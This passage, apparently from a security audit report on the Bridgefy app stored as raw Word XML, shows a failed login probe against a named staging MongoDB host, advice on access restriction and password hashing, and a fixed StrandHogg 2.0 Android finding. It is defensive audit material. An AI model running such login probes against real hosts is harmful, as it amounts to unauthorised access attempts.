        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>date: Sat, 21 Jan 2023 16:53:39 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GMT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>server: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cowboy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="63"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"code"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"WRONG_USERNAME_OR_PWD"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"message"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Auth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>failed"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mongosh </w:t>
      </w:r>
      <w:hyperlink r:id="rId60">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Consolas"/>
            <w:color w:val="333333"/>
            <w:sz w:val="18"/>
          </w:rPr>
          <w:t>mongodb+</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Consolas"/>
            <w:color w:val="DE4F00"/>
            <w:sz w:val="18"/>
          </w:rPr>
          <w:t>srv:</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Consolas"/>
            <w:color w:val="959895"/>
            <w:sz w:val="18"/>
          </w:rPr>
          <w:t>//admin-</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Consolas"/>
            <w:color w:val="959895"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="18"/>
          </w:rPr>
          <w:t>sdk:wrongpass@staging.whqu3.mongodb.net</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="3599" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="720" w:right="3742" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Current Mongosh Log </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ID:</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>63cc2bc68f0538d99be961ca </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Connecting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>to:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mongodb+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>srv:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>//&lt;credentials&gt;@staging.whqu3.mongodb.net/?appName=mongosh+1.6.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MongoServerError: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Authentication failed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="81"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to restrict access to the EMQX dashboard and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MongoDB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>only IP addresses used for server management purposes. Also it is recommended to extrapolate the mitigation guidance offered under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-007</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to improve the password policy. Additionally, storage of MQTT passwords ought to be modified to leverage adequate one-way hashing algorithms designed for password storage, such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>pbkdf2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>bcrypt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> instead of clear-text. It has to be noted that certain secrets should be stored</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>in a deliberately slow manner for protection from brute force attacks, these require a specific</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="71"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="71"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="71"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>hashing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="71"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>algorithms</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>secure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>storage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>explained</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>OWASP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="15"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487597568">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>125498</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="34" name="Graphic 34"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="34" name="Graphic 34"/>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9.881738pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15718912;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape25" coordorigin="1440,198" coordsize="2880,0" path="m1440,198l4320,198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2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="72"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId61">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://www.emqx.io/docs/en/[...]/mnesia.html#create-password-authentication-using-built-in-database</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spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Storage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Cheat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Sheet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>26</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250044" w:id="11"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-032</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Possible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Phishing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>StrandHogg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>2.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="FF9900"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Medium</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="368"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Fix Verified. The Bridgefy team resolved this issue and 7ASecurity verified that the fix is valid.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>staging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>3.0.18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(318)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>build</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to implement the proposed mitigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Testing confirmed that the Android app is currently vulnerable to a number of task hijacking attacks. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>launchMode </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for the app-launcher activity is currently not set and hence defaults to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>standard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>, which mitigates task hijacking via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>StrandHogg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> and other older techniques documented since 2015</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>29</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>, while leaving the app vulnerable to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>StrandHogg 2.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>This vulnerability affects Android versions 3-9.x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>31</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> but was only patched by Google on Android 8-9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>. Since the app supports devices from Android 5 (API level 21), this leaves all users running Android 5-7.x vulnerable, as well as users running unpatched Android 8-9.x devices (common).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="363"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
